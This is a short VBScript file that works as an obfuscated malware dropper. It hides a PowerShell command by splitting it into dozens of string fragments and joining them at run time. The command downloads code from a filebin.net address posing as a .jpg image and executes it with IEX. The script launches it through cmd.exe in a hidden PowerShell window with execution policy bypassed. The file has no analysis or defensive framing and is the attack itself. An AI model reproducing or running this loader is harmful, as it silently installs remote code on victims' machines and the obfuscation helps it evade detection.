
Dim MvPIDlpjSSsoDrEX(88), PDImsSsgDaHoSbSEQDbso, i

' Define each part based on the provided order
MvPIDlpjSSsoDrEX(0) = "[B"
MvPIDlpjSSsoDrEX(1) = "YT"
MvPIDlpjSSsoDrEX(2) = "e["
MvPIDlpjSSsoDrEX(3) = "]]"
MvPIDlpjSSsoDrEX(4) = ";$"
MvPIDlpjSSsoDrEX(5) = "A1"
MvPIDlpjSSsoDrEX(6) = "23"
MvPIDlpjSSsoDrEX(7) = "='"
MvPIDlpjSSsoDrEX(8) = "Ie"
MvPIDlpjSSsoDrEX(9) = "X("
MvPIDlpjSSsoDrEX(10) = "Ne"
MvPIDlpjSSsoDrEX(11) = "W-"
MvPIDlpjSSsoDrEX(12) = "OB"
MvPIDlpjSSsoDrEX(13) = "Je"
MvPIDlpjSSsoDrEX(14) = "CT"
MvPIDlpjSSsoDrEX(15) = " N"
MvPIDlpjSSsoDrEX(16) = "eT"
MvPIDlpjSSsoDrEX(17) = ".W"
MvPIDlpjSSsoDrEX(18) = "';"
MvPIDlpjSSsoDrEX(19) = "$B"
MvPIDlpjSSsoDrEX(20) = "45"
MvPIDlpjSSsoDrEX(21) = "6="
MvPIDlpjSSsoDrEX(22) = "'e"
MvPIDlpjSSsoDrEX(23) = "BC"
MvPIDlpjSSsoDrEX(24) = "LI"
MvPIDlpjSSsoDrEX(25) = "eN"
MvPIDlpjSSsoDrEX(26) = "T)"
MvPIDlpjSSsoDrEX(27) = ".D"
MvPIDlpjSSsoDrEX(28) = "OW"
MvPIDlpjSSsoDrEX(29) = "NL"
MvPIDlpjSSsoDrEX(30) = "O'"
MvPIDlpjSSsoDrEX(31) = ";["
MvPIDlpjSSsoDrEX(32) = "BY"
MvPIDlpjSSsoDrEX(33) = "Te"
MvPIDlpjSSsoDrEX(34) = "[]"
MvPIDlpjSSsoDrEX(35) = "];"
MvPIDlpjSSsoDrEX(36) = "$C"
MvPIDlpjSSsoDrEX(37) = "78"
MvPIDlpjSSsoDrEX(38) = "9="
MvPIDlpjSSsoDrEX(39) = "'V"
MvPIDlpjSSsoDrEX(40) = "AN"
MvPIDlpjSSsoDrEX(41) = "('"
MvPIDlpjSSsoDrEX(42) = "'ht"
MvPIDlpjSSsoDrEX(43) = "tp"
MvPIDlpjSSsoDrEX(44) = "s:"
MvPIDlpjSSsoDrEX(45) = "//"
MvPIDlpjSSsoDrEX(46) = "filebin.net"
MvPIDlpjSSsoDrEX(47) = "/pb"
MvPIDlpjSSsoDrEX(48) = "yas8q"
MvPIDlpjSSsoDrEX(49) = "gya1a"
MvPIDlpjSSsoDrEX(50) = "z5ho"
MvPIDlpjSSsoDrEX(51) = "/Bar"
MvPIDlpjSSsoDrEX(52) = "B"
MvPIDlpjSSsoDrEX(53) = "a"
MvPIDlpjSSsoDrEX(54) = "r"
MvPIDlpjSSsoDrEX(55) = "Baro"
MvPIDlpjSSsoDrEX(56) = "ssa.jpg"
MvPIDlpjSSsoDrEX(57) = "''"
MvPIDlpjSSsoDrEX(58) = ")'"
MvPIDlpjSSsoDrEX(59) = ".R"
MvPIDlpjSSsoDrEX(60) = "eP"
MvPIDlpjSSsoDrEX(61) = "LA"
MvPIDlpjSSsoDrEX(62) = "Ce"
MvPIDlpjSSsoDrEX(63) = "('"
MvPIDlpjSSsoDrEX(64) = "VA"
MvPIDlpjSSsoDrEX(65) = "N'"
MvPIDlpjSSsoDrEX(66) = ",'"
MvPIDlpjSSsoDrEX(67) = "AD"
MvPIDlpjSSsoDrEX(68) = "ST"
MvPIDlpjSSsoDrEX(69) = "RI"
MvPIDlpjSSsoDrEX(70) = "NG"
MvPIDlpjSSsoDrEX(71) = "')"
MvPIDlpjSSsoDrEX(72) = ";["
MvPIDlpjSSsoDrEX(73) = "BY"
MvPIDlpjSSsoDrEX(74) = "Te"
MvPIDlpjSSsoDrEX(75) = "[]"
MvPIDlpjSSsoDrEX(76) = "];"
MvPIDlpjSSsoDrEX(77) = "Ie"
MvPIDlpjSSsoDrEX(78) = "X("
MvPIDlpjSSsoDrEX(79) = "$A"
MvPIDlpjSSsoDrEX(80) = "12"
MvPIDlpjSSsoDrEX(81) = "3+"
MvPIDlpjSSsoDrEX(82) = "$B"
MvPIDlpjSSsoDrEX(83) = "45"
MvPIDlpjSSsoDrEX(84) = "6+"
MvPIDlpjSSsoDrEX(85) = "$C"
MvPIDlpjSSsoDrEX(86) = "78"
MvPIDlpjSSsoDrEX(87) = "9)"

' Combine the parts into one string
PDImsSsgDaHoSbSEQDbso = ""
For i = 0 To 88 - 1
    PDImsSsgDaHoSbSEQDbso = PDImsSsgDaHoSbSEQDbso & MvPIDlpjSSsoDrEX(i)
Next

' Use the combinedParts in the shell execution
Set objShell = CreateObject("WScript.Shell")
objShell.Run "Cmd.exe /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI " & PDImsSsgDaHoSbSEQDbso, 0, True
Set objShell = Nothing
